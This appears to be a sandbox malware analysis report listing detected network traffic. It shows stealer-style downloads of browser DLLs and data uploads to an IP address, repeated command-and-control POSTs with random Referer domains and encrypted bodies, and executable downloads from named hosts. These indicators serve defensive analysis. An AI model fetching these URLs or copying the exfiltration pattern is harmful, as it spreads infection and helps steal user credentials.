Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKJJECAEGCBGDHDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 132793Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmfugrrqioxydpvj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxhroocyyify.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yyrmwlijroc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phdpdtvujavixd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekbhjiugbuwcwtmu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://twoursfynqoileqq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fupehafhlnpyou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edhynpdtmkea.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxllolfqvkh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 139Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://apkbthcutmq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xkocmvnipxqqfup.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ygytcnantfux.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awayqydmiytmar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwhaihbnyhyxnnhu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcuhrqgapjbmm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scsrfrjxtrigj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xplinqkvhni.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdgpndakpxadhnb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpudkoaipgmn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvxpewpgqyblpfqc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anwvnbknhlqgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbrnvdnfmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbrnvdnfmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 3c bf b9 19 27 d4 70 77 b9 06 74 58 58 48 9f e6 bb 2c b1 b0 af d7 39 59 53 2f 5a c5 6b 46 ae 13 0c 61 64 9a 2a 97 bf 78 ca 1b 6c 48 52 a8 f8 5a 38 76 d2 3f 8f a7 5e 14 df ff 3d ab 54 3e 11 d9 76 d6 77 b6 84 f4 d8 98 43 c5 24 a2 7e Data Ascii: k9w4yBD1^h}k\Fu$f]d<'pwtXXH,9YS/ZkFad*xlHRZ8v?^=T>vwC$~
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbrnvdnfmew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 3c bf b9 19 27 d4 70 77 b9 06 74 58 58 48 9f e6 bb 2c b1 b0 af d7 39 59 53 2f 5a c5 6b 46 ae 13 0c 61 64 9a 2a 97 bf 78 ca 1b 6c 48 52 a8 f8 5a 38 76 d2 3f 8f a7 5e 14 df ff 3d ab 54 3e 11 d9 76 d6 77 b6 84 f4 d8 98 43 c5 24 a2 7e Data Ascii: k9w4yBD1^h}k\Fu$f]d<'pwtXXH,9YS/ZkFad*xlHRZ8v?^=T>vwC$~
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfuerexislgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upixukbaggkkpn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nksopmxhnnxiata.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arvbscjewhsui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://msmrjqievyxvat.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sswicaghdws.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xueylbuhcqkh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywbvdqwewtk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywbvdqwewtk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 3e 96 8b 23 25 de 56 60 d7 76 13 05 04 79 ad 97 c9 6f c4 ca ad f5 11 4a 0b 06 75 88 7b 43 f7 13 24 75 06 cc 18 ee b7 6a a5 4f 2c 27 5a a6 ad 4e 4c 48 ac 30 9e ca 7d 13 d9 b6 51 8e 07 40 3a ef 27 fd 4f ad b6 da f7 c8 47 9e 57 94 5d 79 14 67 5b 8d 4c 9c dd 23 cc d4 72 a9 a2 62 49 13 9f b1 d8 ee 8c 13 7e a3 da f9 c7 f1 25 52 ab 8d ec b0 36 58 23 11 5b b0 f8 25 74 49 df 8c 9a 7a f0 68 16 3a 81 14 4c bd c1 49 d3 70 a4 58 d4 ff 15 36 ec 70 86 81 80 74 ba ad 77 07 ce 53 28 88 d8 e5 d8 1d c2 85 3e 70 df 6c e8 b6 0f 4b cf a3 73 a6 52 87 38 78 71 5c 9d ea 67 2b 32 c8 8c 6b 1b 6d 46 25 08 Data Ascii: k9w4yBD1^h}k\Fu$f]d>#%V`vyoJu{C$ujO,'ZNLH0}Q@:'OGW]yg[L#rbI~%R6X#[%tIzh:LIpX6ptwS(>plKsR8xq\g+2kmF%
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ywbvdqwewtk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: trad-einmyus.comData Raw: 12 87 f7 99 6b f9 d2 ba c2 39 77 34 79 bd e2 8d 42 1f a9 44 d5 31 19 99 bd 9c ae f0 f3 a2 9b f6 1f c1 5e a8 68 1a bf e7 ea ac f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 84 66 5d 02 c8 a1 c1 64 3e 96 8b 23 25 de 56 60 d7 76 13 05 04 79 ad 97 c9 6f c4 ca ad f5 11 4a 0b 06 75 88 7b 43 f7 13 24 75 06 cc 18 ee b7 6a a5 4f 2c 27 5a a6 ad 4e 4c 48 ac 30 9e ca 7d 13 d9 b6 51 8e 07 40 3a ef 27 fd 4f ad b6 da f7 c8 47 9e 57 94 5d 79 14 67 5b 8d 4c 9c dd 23 cc d4 72 a9 a2 62 49 13 9f b1 d8 ee 8c 13 7e a3 da f9 c7 f1 25 52 ab 8d ec b0 36 58 23 11 5b b0 f8 25 74 49 df 8c 9a 7a f0 68 16 3a 81 14 4c bd c1 49 d3 70 a4 58 d4 ff 15 36 ec 70 86 81 80 74 ba ad 77 07 ce 53 28 88 d8 e5 d8 1d c2 85 3e 70 df 6c e8 b6 0f 4b cf a3 73 a6 52 87 38 78 71 5c 9d ea 67 2b 32 c8 8c 6b 1b 6d 46 25 08 Data Ascii: k9w4yBD1^h}k\Fu$f]d>#%V`vyoJu{C$ujO,'ZNLH0}Q@:'OGW]yg[L#rbI~%R6X#[%tIzh:LIpX6ptwS(>plKsR8xq\g+2kmF%
Source: global traffic HTTP traffic detected: GET /osminogs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: m2reg.ulm.ac.id
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdsqoggpfrmafq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdvtvvujfpykxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://flxeggavyom.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdeutjvmtpeybn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svcrlgovfyqyxld.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mbkechetmnnrcdik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nldnpyxotgr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://maghsaqdhdw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vougeeiwtdhw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://freqadqrkclin.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxxyleynxaf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fjcrkcgcbfgpa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://poplxshctilgi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjbcpvchovjhab.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myghbxnpjrq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbtcjwrtgvaph.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://howwnamvvlywf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wyuccaycqhmwcb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwcftddidtvatlv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rqpbkpdpqtpulcwg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://exmgwmmbekxckvpr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: trad-einmyus.com
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
Source: unknown TCP traffic detected without corresponding DNS query: 78.46.229.36
